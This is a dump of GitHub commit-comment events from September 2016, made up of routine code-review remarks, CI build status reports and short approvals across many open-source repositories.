{"id":"4502689131","type":"CommitCommentEvent","actor":{"login":"vinoth4apigee"},"repo":{"name":"openhoat/naught"},"payload":{"comment":{"id":18864059,"position":null,"line":null,"path":null,"commit_id":"df8e851e9f78980abde5273bf2bbeaa67b5dba4c","created_at":"2016-09-01T13:50:33Z","updated_at":"2016-09-01T13:50:33Z","body":"I have the need to use naught programatically and not from CLI. I see you have done those changes and undone again in this commit. Any specific reasons ?"}},"created_at":"2016-09-01T13:50:33Z"}
{"id":"4502689830","type":"CommitCommentEvent","actor":{"login":"terw-dan"},"repo":{"name":"Yoast/wordpress-develop-mirror"},"payload":{"comment":{"id":18864060,"position":28,"line":26,"path":"src/wp-admin/js/media-upload.js","commit_id":"bf991fa6da1d74a1d72b18ff5a516703d5fd537f","created_at":"2016-09-01T13:50:40Z","updated_at":"2016-09-01T13:50:40Z","body":"Please use `@returns`."}},"created_at":"2016-09-01T13:50:40Z"}
{"id":"4502690093","type":"CommitCommentEvent","actor":{"login":"lekma"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18864062,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T13:50:43Z","updated_at":"2016-09-01T13:50:43Z","body":"oh! ok I see what you mean...\r\nIf you have vaapi (or any other hwaccel) built in ffmpeg and 'Hardware acceleration' is checked in the codec profile for the encoder (codec profiles are only for _encoders_) then yes, tvh will try to find an hwaccel for the _decoder_."}},"created_at":"2016-09-01T13:50:43Z"}
{"id":"4502690574","type":"CommitCommentEvent","actor":{"login":"zzzTooo"},"repo":{"name":"Mogicians/Algorithm_Template"},"payload":{"comment":{"id":18864064,"position":null,"line":null,"path":null,"commit_id":"8115606cf19bbe460cfd4d667c42a8a4a4e250a8","created_at":"2016-09-01T13:50:48Z","updated_at":"2016-09-01T13:50:48Z","body":"乘法逆元"}},"created_at":"2016-09-01T13:50:48Z"}
{"id":"4502692146","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864067,"position":null,"line":null,"path":null,"commit_id":"b3e9b0ca7682d8c6a16c573cf96cbd09bd6596fc","created_at":"2016-09-01T13:51:05Z","updated_at":"2016-09-01T13:51:05Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 883](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12202&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 67 (66 new), passed: 123, ignored: 3 Build time: 00:07:17\n### Failed tests\n```\norg.genivi.sota.resolver.test.PackagesResourceWordSpec.Packages resource should be able to handle unicode descriptions: <no details avaliable>\n\norg.genivi.sota.resolver.test.PackagesResourceWordSpec.Packages resource should GET /packages/:pkgName/:pkgVersion should return the package or fail: <no details avaliable>\n\norg.genivi.sota.resolver.test.ComponentResourceSpec.Component resource should add component on PUT /components/:partNumber { description }: <no details avaliable>\n\norg.genivi.sota.resolver.test.ComponentResourceSpec.Component resource should fail if part number isn't a 30 character or shorter alpha numeric string: <no details avaliable>\n\norg.genivi.sota.resolver.test.ComponentResourceSpec.Component resource should list all available components on GET /components: <no details avaliable>\n\norg.genivi.sota.resolver.test.ComponentResourceSpec.Component resource should list all components matching a regex on GET /components?regex=:regex: <no details avaliable>\n\norg.genivi.sota.resolver.test.ComponentResourceSpec.Component resource should fail on trying to list components matching a malformated regex: <no details avaliable>\n\norg.genivi.sota.resolver.test.ComponentResourceSpec.Component resource should delete components on DELETE /components/:partNumber: <no details avaliable>\n\norg.genivi.sota.resolver.test.VehiclesResourceWordSpec.Vin resource should install a package on a VIN on PUT request to /vehicles/:vin/package/:packageName/:packageVersion: <no details avaliable>\n\norg.genivi.sota.resolver.test.VehiclesResourceWordSpec.Vin resource should fail to install a non-existing package on a VIN: <no details avaliable>\n\norg.genivi.sota.resolver.test.VehiclesResourceWordSpec.Vin resource should list installed packages on a VIN on GET request to /vehicles/:vin/package: <no details avaliable>\n\n\n##### there are 57 more failed tests, see build details\n```\n"}},"created_at":"2016-09-01T13:51:05Z"}
{"id":"4502695317","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864074,"position":null,"line":null,"path":null,"commit_id":"eecdae8d35b42343e03d9917469fb18acef5c207","created_at":"2016-09-01T13:51:37Z","updated_at":"2016-09-01T13:51:37Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 884](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12209&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T13:51:37Z"}
{"id":"4502699770","type":"CommitCommentEvent","actor":{"login":"PedroPinheiro"},"repo":{"name":"goatslacker/alt"},"payload":{"comment":{"id":18864084,"position":null,"line":null,"path":null,"commit_id":"5b41cadc33b425c53c925de4cb0dafefe7a20982","created_at":"2016-09-01T13:52:22Z","updated_at":"2016-09-01T13:52:22Z","body":"new release please!  =)"}},"created_at":"2016-09-01T13:52:22Z"}
{"id":"4502709636","type":"CommitCommentEvent","actor":{"login":"terw-dan"},"repo":{"name":"Yoast/wordpress-develop-mirror"},"payload":{"comment":{"id":18864104,"position":null,"line":null,"path":null,"commit_id":"bf991fa6da1d74a1d72b18ff5a516703d5fd537f","created_at":"2016-09-01T13:54:00Z","updated_at":"2016-09-01T13:54:00Z","body":"CR done"}},"created_at":"2016-09-01T13:54:00Z"}
{"id":"4502711236","type":"CommitCommentEvent","actor":{"login":"sez11a"},"repo":{"name":"sez11a/liferay-docs"},"payload":{"comment":{"id":18864107,"position":11,"line":281,"path":"discover/deployment/articles-dxp/03-maintaining-liferay/02-patching-liferay.markdown","commit_id":"0f06f6535b995f8a96639c4e612437d2f759c922","created_at":"2016-09-01T13:54:17Z","updated_at":"2016-09-01T13:54:17Z","body":"That would be $CATALINA_HOME/work, not $LIFERAY_HOME/work, right? I specifically didn't mention $CATALINA_HOME/work exactly because of that. In my conversation with Dave and @rotty3000, they seemed to indicate that it's only $LIFERARY_HOME/work that would need to be cleaned out. "}},"created_at":"2016-09-01T13:54:17Z"}
{"id":"4502712747","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"ScrewdAOSP/build"},"payload":{"comment":{"id":18864110,"position":null,"line":null,"path":null,"commit_id":"dd3ecee71475bef2ac73d1175ef306e59367b86d","created_at":"2016-09-01T13:54:31Z","updated_at":"2016-09-01T13:54:31Z","body":"This is Dope  👍 "}},"created_at":"2016-09-01T13:54:31Z"}
{"id":"4502712993","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"lucascomp/EDL"},"payload":{"comment":{"id":18864112,"position":null,"line":null,"path":null,"commit_id":"aa16d465f01ef12f23169844ca1a61e79c71f23d","created_at":"2016-09-01T13:54:34Z","updated_at":"2016-09-01T13:54:34Z","body":":+1:"}},"created_at":"2016-09-01T13:54:34Z"}
{"id":"4502719928","type":"CommitCommentEvent","actor":{"login":"CvH"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18864121,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T13:55:44Z","updated_at":"2016-09-01T13:55:44Z","body":"every little bit is counting :+1: "}},"created_at":"2016-09-01T13:55:44Z"}
{"id":"4502726192","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864134,"position":null,"line":null,"path":null,"commit_id":"3e22b844c5ccb254d7abf9924b123381467ff3e1","created_at":"2016-09-01T13:56:48Z","updated_at":"2016-09-01T13:56:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 885](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12212&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T13:56:48Z"}
{"id":"4502726584","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-writing-gs-guides"},"payload":{"comment":{"id":18864136,"position":102,"line":95,"path":"README.adoc","commit_id":"7e0776e8d7337d0d2123c15a4f73916b6f5a6425","created_at":"2016-09-01T13:56:52Z","updated_at":"2016-09-01T13:56:52Z","body":"Also, I'm not sure about this recommendation right now. The continuous build is constantly executing due to:\r\n\r\n    modified: /Users/pledbrook/dev/projects/gs-building-java-library/.gradle/3.0/taskArtifacts/cache.properties.lock\r\n    modified: /Users/pledbrook/dev/projects/gs-building-java-library/.gradle/3.0/taskArtifacts/fileHashes.bin\r\n\r\nI don't know if this is because of the configuration of the Asciidoctor plugin or something in Gradle. I suspect the former as the plugin doesn't specify inputs very precisely."}},"created_at":"2016-09-01T13:56:52Z"}
{"id":"4502728609","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18864140,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-01T13:57:12Z","updated_at":"2016-09-01T13:57:12Z","body":"TeamCity Chorus :: chorus-precise64-master Continuous [Build 2.6.662.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76322&buildTypeId=bt323) outcome was **SUCCESS**\nSummary: Tests passed: 937, ignored: 56 Build time: 00:18:58"}},"created_at":"2016-09-01T13:57:12Z"}
{"id":"4502730121","type":"CommitCommentEvent","actor":{"login":"zjhmale"},"repo":{"name":"rikvdkleij/intellij-haskell"},"payload":{"comment":{"id":18864141,"position":null,"line":null,"path":null,"commit_id":"b9c77924a07d22162e931590d0cf9d464a8373f7","created_at":"2016-09-01T13:57:26Z","updated_at":"2016-09-01T13:57:26Z","body":"cool! breaking change! so we totally get rid of `ghc-mod` for now?"}},"created_at":"2016-09-01T13:57:26Z"}
{"id":"4502732390","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18864143,"position":7,"line":278,"path":"plugins/XmlMaterialProfile/XmlMaterialProfile.py","commit_id":"cb1a36577c8ab6686bb1f83ced2f0e61a09bf3e2","created_at":"2016-09-01T13:57:49Z","updated_at":"2016-09-01T13:57:49Z","body":"I struggled quite a bit with the name myself. This was sorta the best I could come up with. Which one of your options do you prefer?"}},"created_at":"2016-09-01T13:57:49Z"}
{"id":"4502734807","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864149,"position":null,"line":null,"path":null,"commit_id":"3e22b844c5ccb254d7abf9924b123381467ff3e1","created_at":"2016-09-01T13:58:13Z","updated_at":"2016-09-01T13:58:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 886](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12213&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T13:58:13Z"}
{"id":"4502736799","type":"CommitCommentEvent","actor":{"login":"gdolle"},"repo":{"name":"feelpp/nlopt"},"payload":{"comment":{"id":18864153,"position":null,"line":null,"path":null,"commit_id":"c035e4567859875f61767d6ae2b8677de5805341","created_at":"2016-09-01T13:58:33Z","updated_at":"2016-09-01T13:58:33Z","body":":+1: "}},"created_at":"2016-09-01T13:58:33Z"}
{"id":"4502737288","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864155,"position":null,"line":null,"path":null,"commit_id":"eecdae8d35b42343e03d9917469fb18acef5c207","created_at":"2016-09-01T13:58:39Z","updated_at":"2016-09-01T13:58:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 884](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12209&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 189, ignored: 3 Build time: 00:07:02\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T13:58:39Z"}
{"id":"4502742245","type":"CommitCommentEvent","actor":{"login":"KarambaKG"},"repo":{"name":"KarambaKG/foodfinal"},"payload":{"comment":{"id":18864166,"position":null,"line":null,"path":null,"commit_id":"72a327d93e5f595187f7637de6eecfbaa47e7924","created_at":"2016-09-01T13:59:29Z","updated_at":"2016-09-01T13:59:29Z","body":"asdfasfd"}},"created_at":"2016-09-01T13:59:29Z"}
{"id":"4502743677","type":"CommitCommentEvent","actor":{"login":"STRML"},"repo":{"name":"BitMEX/react-raf-batching"},"payload":{"comment":{"id":18864168,"position":78,"line":78,"path":"ReactRAFBatchingStrategy.es6","commit_id":"6a4208cc1c52dbff69cb0726dc78f0e818efa8fa","created_at":"2016-09-01T13:59:43Z","updated_at":"2016-09-01T13:59:43Z","body":"It's already a singleton anyway - I found it simply ensures that there are no binding problems. "}},"created_at":"2016-09-01T13:59:43Z"}
{"id":"4502746291","type":"CommitCommentEvent","actor":{"login":"STRML"},"repo":{"name":"BitMEX/react-raf-batching"},"payload":{"comment":{"id":18864176,"position":26,"line":26,"path":"ReactRAFBatchingStrategy.es6","commit_id":"6a4208cc1c52dbff69cb0726dc78f0e818efa8fa","created_at":"2016-09-01T14:00:10Z","updated_at":"2016-09-01T14:00:10Z","body":"Yeah, appears to be an artifact of a refactor. Thanks."}},"created_at":"2016-09-01T14:00:10Z"}
{"id":"4502752389","type":"CommitCommentEvent","actor":{"login":"nkimble"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18864186,"position":50,"line":111,"path":"src/main/java/edu/cornell/kfs/pdp/batch/service/impl/PayeeACHAccountExtractServiceImpl.java","commit_id":"2b4520d279a12f580c88f0b32d9c9827d7f837d7","created_at":"2016-09-01T14:01:08Z","updated_at":"2016-09-01T14:01:08Z","body":"Changed to use just the int value."}},"created_at":"2016-09-01T14:01:08Z"}
{"id":"4502755245","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18864195,"position":7,"line":278,"path":"plugins/XmlMaterialProfile/XmlMaterialProfile.py","commit_id":"cb1a36577c8ab6686bb1f83ced2f0e61a09bf3e2","created_at":"2016-09-01T14:01:35Z","updated_at":"2016-09-01T14:01:35Z","body":"I prefer \"expand\" (as in the opposite of \"collapse\") over \"unshare\"."}},"created_at":"2016-09-01T14:01:35Z"}
{"id":"4502763672","type":"CommitCommentEvent","actor":{"login":"joschi"},"repo":{"name":"Graylog2/graylog-plugin-slack"},"payload":{"comment":{"id":18864209,"position":null,"line":null,"path":null,"commit_id":"ef55ffd207d6c7f26449b092b2867d6de2e49446","created_at":"2016-09-01T14:02:57Z","updated_at":"2016-09-01T14:02:57Z","body":"@erSitzt Feel free to create a feature request for this at https://github.com/Graylog2/graylog-plugin-slack/issues, but currently we won't put much more effort into Graylog 1.x and plugin compatibility with it.\r\n\r\nOut of interest, what's holding you back to upgrade to Graylog 2.x?"}},"created_at":"2016-09-01T14:02:57Z"}
{"id":"4502764234","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18864210,"position":81,"line":307,"path":"plugins/XmlMaterialProfile/XmlMaterialProfile.py","commit_id":"bacac1e42e48e240ed2e6e71df999c7e54933de2","created_at":"2016-09-01T14:03:03Z","updated_at":"2016-09-01T14:03:03Z","body":"You missed the space at the end of setting"}},"created_at":"2016-09-01T14:03:03Z"}
{"id":"4502767270","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18864218,"position":null,"line":null,"path":null,"commit_id":"0a08eee5711256319f9b72a4245f92b2f51af590","created_at":"2016-09-01T14:03:34Z","updated_at":"2016-09-01T14:03:34Z","body":"@TheDiamondYT1 why should you? a console can scroll through, a client can't (well, before 0.16)"}},"created_at":"2016-09-01T14:03:34Z"}
{"id":"4502768145","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18864222,"position":84,"line":310,"path":"plugins/XmlMaterialProfile/XmlMaterialProfile.py","commit_id":"bacac1e42e48e240ed2e6e71df999c7e54933de2","created_at":"2016-09-01T14:03:42Z","updated_at":"2016-09-01T14:03:42Z","body":"I thought that slicing always creates a copy. "}},"created_at":"2016-09-01T14:03:42Z"}
{"id":"4502768836","type":"CommitCommentEvent","actor":{"login":"timgraham"},"repo":{"name":"django/django"},"payload":{"comment":{"id":18864224,"position":14,"line":77,"path":"docs/ref/contrib/gis/install/postgis.txt","commit_id":"6b54504e667da3f6bc53b887ffd7e8cc113a94b1","created_at":"2016-09-01T14:03:48Z","updated_at":"2016-09-01T14:03:48Z","body":"Sorry, I meant that the dots would go above `operations = [` (i.e. the migration might have some dependencies, initial=True, etc.). Feel free to ignore if you don't think it'll be a point of confusion."}},"created_at":"2016-09-01T14:03:48Z"}
{"id":"4502770112","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gs-guides"},"payload":{"comment":{"id":18864225,"position":102,"line":95,"path":"README.adoc","commit_id":"7e0776e8d7337d0d2123c15a4f73916b6f5a6425","created_at":"2016-09-01T14:04:01Z","updated_at":"2016-09-01T14:04:01Z","body":"> Also, I'm not sure about this recommendation right now. The continuous build...\r\n\r\nSee my comment about this at https://github.com/gradle/build-tool-web/issues/71#issuecomment-243594614 I'm just leaving it there for now to remind me to file a bug about this."}},"created_at":"2016-09-01T14:04:01Z"}
{"id":"4502775095","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18864253,"position":null,"line":null,"path":null,"commit_id":"0a08eee5711256319f9b72a4245f92b2f51af590","created_at":"2016-09-01T14:04:53Z","updated_at":"2016-09-01T14:04:53Z","body":"#0.16FTW"}},"created_at":"2016-09-01T14:04:53Z"}
{"id":"4502776149","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864260,"position":null,"line":null,"path":null,"commit_id":"f8e4e8a1b15a99153280529636eb694626dd6dcf","created_at":"2016-09-01T14:05:05Z","updated_at":"2016-09-01T14:05:05Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 887](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12219&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T14:05:05Z"}
{"id":"4502776152","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864259,"position":null,"line":null,"path":null,"commit_id":"3e22b844c5ccb254d7abf9924b123381467ff3e1","created_at":"2016-09-01T14:05:05Z","updated_at":"2016-09-01T14:05:05Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 886](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12213&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 189, ignored: 3 Build time: 00:06:52\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T14:05:05Z"}
{"id":"4502779936","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18864269,"position":4,"line":4,"path":"site/leigh.html","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T14:05:44Z","updated_at":"2016-09-01T14:05:44Z","body":"I'd probably stick with `<meta charset=\"utf-8\" />` (http://stackoverflow.com/a/4696517/1089579). But WELL DONE for including this, it's actually really important."}},"created_at":"2016-09-01T14:05:44Z"}
{"id":"4502780662","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864270,"position":null,"line":null,"path":null,"commit_id":"3e22b844c5ccb254d7abf9924b123381467ff3e1","created_at":"2016-09-01T14:05:52Z","updated_at":"2016-09-01T14:05:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 885](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12212&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 189, ignored: 3 Build time: 00:09:04\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T14:05:52Z"}
{"id":"4502786614","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"CaioSaud/EDL"},"payload":{"comment":{"id":18864278,"position":null,"line":null,"path":null,"commit_id":"2b4219be7fafde982bad2e937e5c5c5b563d6c03","created_at":"2016-09-01T14:06:52Z","updated_at":"2016-09-01T14:06:52Z","body":"Favor habilitar \"issues\" no seu repositório:\r\nhttps://github.com/fsantanna/EDL#0803-1\r\n\r\nDe maneira geral, o artigo está muito abstrato, sem entrar muito em detalhes e exemplos concretos:\r\n- \"Origens e Influências\": algum exemplo de \"como\" ela é diferente da versão antiga?\r\n- \"Classificação\": novamente, exemplo de \"como\" ela é estática e \"como\" ela pode \"funcionar de forma\r\n dinâmica\"?\r\n- \"Avaliação Comparativa\": novamente, exemplo das diferenças com C#?\r\n- Onde estão os exemplos de código representativos?"}},"created_at":"2016-09-01T14:06:52Z"}
{"id":"4502790594","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"stevengj/DecFP.jl"},"payload":{"comment":{"id":18864285,"position":5,"line":89,"path":"src/DecFP.jl","commit_id":"b3eacef8239775c9faa5119fe531ffd112d8d9ba","created_at":"2016-09-01T14:07:34Z","updated_at":"2016-09-01T14:07:34Z","body":"doesn't need `@compat`, but does need newer Compat minimum version https://github.com/JuliaLang/Compat.jl/commit/3c52b4151c8e09d53cbdd4d40ce704b7c5a8c074"}},"created_at":"2016-09-01T14:07:34Z"}
{"id":"4502792283","type":"CommitCommentEvent","actor":{"login":"nkimble"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18864290,"position":81,"line":136,"path":"src/main/java/edu/cornell/kfs/pdp/batch/service/impl/PayeeACHAccountExtractServiceImpl.java","commit_id":"2b4520d279a12f580c88f0b32d9c9827d7f837d7","created_at":"2016-09-01T14:07:50Z","updated_at":"2016-09-01T14:07:50Z","body":"Changed to use just the int value."}},"created_at":"2016-09-01T14:07:50Z"}
{"id":"4502795463","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18864295,"position":null,"line":null,"path":null,"commit_id":"ac272125cd1d22eb526b1479b39cc34f5baa8367","created_at":"2016-09-01T14:08:22Z","updated_at":"2016-09-01T14:08:22Z","body":"develop (kbenne) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T14:08:22Z"}
{"id":"4502796264","type":"CommitCommentEvent","actor":{"login":"bobjacobsen"},"repo":{"name":"JMRI/JMRI"},"payload":{"comment":{"id":18864297,"position":16,"line":51,"path":"java/src/jmri/NamedBeanHandleManager.java","commit_id":"6b19b45d65f8663b2ac010d839f1ae9c45344d7f","created_at":"2016-09-01T14:08:30Z","updated_at":"2016-09-01T14:08:30Z","body":"\n> This @CheckForNull change is showing as an error in Eclipse (Mars) for me. Specifically:\n> Annotation types that do not specify explicit target element types cannot be applied here\n> Any suggestions?\n\nThis might be due to Eclipse being confused about JSR-305 vs JSR-308 annotations.  \n\nCould you check to see if the lib/jsr305.jar file is in the classpath?\n\nAlso, which JDK is being used?\n\n"}},"created_at":"2016-09-01T14:08:30Z"}
{"id":"4502796757","type":"CommitCommentEvent","actor":{"login":"tmtmtmtm"},"repo":{"name":"everypolitician/viewer-sinatra"},"payload":{"comment":{"id":18864298,"position":null,"line":null,"path":null,"commit_id":"18771c2ffdba3ca4181a1558bc9037fd353e18cb","created_at":"2016-09-01T14:08:35Z","updated_at":"2016-09-01T14:08:35Z","body":"It would be good if this showed the behaviour in cases where there is no area or group on a Membership. \r\n\r\nAfghanistan might be a good example case to use for that."}},"created_at":"2016-09-01T14:08:35Z"}
{"id":"4502797741","type":"CommitCommentEvent","actor":{"login":"adambenson"},"repo":{"name":"adambenson/CMP73010-Ass1-2016"},"payload":{"comment":{"id":18864299,"position":null,"line":null,"path":null,"commit_id":"8e064e1199c1009c1019996b1f02634dde2053ee","created_at":"2016-09-01T14:08:45Z","updated_at":"2016-09-01T14:08:45Z","body":"[CMP73010.docx](https://github.com/adambenson/CMP73010-Ass1-2016/files/449843/CMP73010.docx)\r\n"}},"created_at":"2016-09-01T14:08:45Z"}
{"id":"4502801193","type":"CommitCommentEvent","actor":{"login":"nkimble"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18864308,"position":75,"line":130,"path":"src/main/java/edu/cornell/kfs/pdp/batch/service/impl/PayeeACHAccountExtractServiceImpl.java","commit_id":"2b4520d279a12f580c88f0b32d9c9827d7f837d7","created_at":"2016-09-01T14:09:21Z","updated_at":"2016-09-01T14:09:21Z","body":"Changed code to suggestion."}},"created_at":"2016-09-01T14:09:21Z"}
{"id":"4502803265","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18864312,"position":11,"line":11,"path":"site/leigh.html","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T14:09:42Z","updated_at":"2016-09-01T14:09:42Z","body":"Need the full name here I think — Google looks at headings and ties them in to page titles for added weight"}},"created_at":"2016-09-01T14:09:42Z"}
{"id":"4502807456","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18864326,"position":null,"line":null,"path":null,"commit_id":"8c5401990ab849d9e48fd42578143f7cc1bc1a9c","created_at":"2016-09-01T14:10:25Z","updated_at":"2016-09-01T14:10:25Z","body":"++"}},"created_at":"2016-09-01T14:10:25Z"}
{"id":"4502808883","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18864327,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T14:10:38Z","updated_at":"2016-09-01T14:10:38Z","body":"Yep. The Cargo Mod works exactly as intended if off or on. Going to do a pull request on that file just to clean some grammar errors and put the UPDATE to Language_en_US in the right spot (updated on my end for the test, and Melee ships will tell you how many cargo units they can hold in Civilopedia)."}},"created_at":"2016-09-01T14:10:38Z"}
{"id":"4502809579","type":"CommitCommentEvent","actor":{"login":"Ozymandias81"},"repo":{"name":"Kizoky/Mr_SmileyII"},"payload":{"comment":{"id":18864329,"position":null,"line":null,"path":null,"commit_id":"2e12477adc770f28f50faf8d5bc5387be0288f38","created_at":"2016-09-01T14:10:46Z","updated_at":"2016-09-01T14:10:46Z","body":"So better keep it as it is for now, as a suggestion. BTW keep in mind that you always need to know what you're doing :tongue: "}},"created_at":"2016-09-01T14:10:46Z"}
{"id":"4502809638","type":"CommitCommentEvent","actor":{"login":"Kungsgeten"},"repo":{"name":"abo-abo/worf"},"payload":{"comment":{"id":18864330,"position":null,"line":null,"path":null,"commit_id":"1776bd97cf186c4d5a234087f2b63d5a412b15f3","created_at":"2016-09-01T14:10:47Z","updated_at":"2016-09-01T14:10:47Z","body":"Is the idea here that the `worf-beginning-of-line` variable should be `t` in order for the `worf-beginning-of-line` function to work as documented?"}},"created_at":"2016-09-01T14:10:47Z"}
{"id":"4502809696","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"lamozg6/homework10"},"payload":{"comment":{"id":18864331,"position":63,"line":63,"path":"src/bin/User.java","commit_id":"b95a575ea75ec928e5640b6a3a8574e74546d65f","created_at":"2016-09-01T14:10:47Z","updated_at":"2016-09-01T14:10:47Z","body":"User object@ value objecta. Ira npatak@ tvyalner pahelna. Isk es metod@ mi qich chi hamapatasxanum et gaxaparin. "}},"created_at":"2016-09-01T14:10:47Z"}
{"id":"4502809895","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864332,"position":null,"line":null,"path":null,"commit_id":"842775a06412ea7eb117e4f9e96a25c44cbb9ddb","created_at":"2016-09-01T14:10:49Z","updated_at":"2016-09-01T14:10:49Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 888](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12222&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T14:10:49Z"}
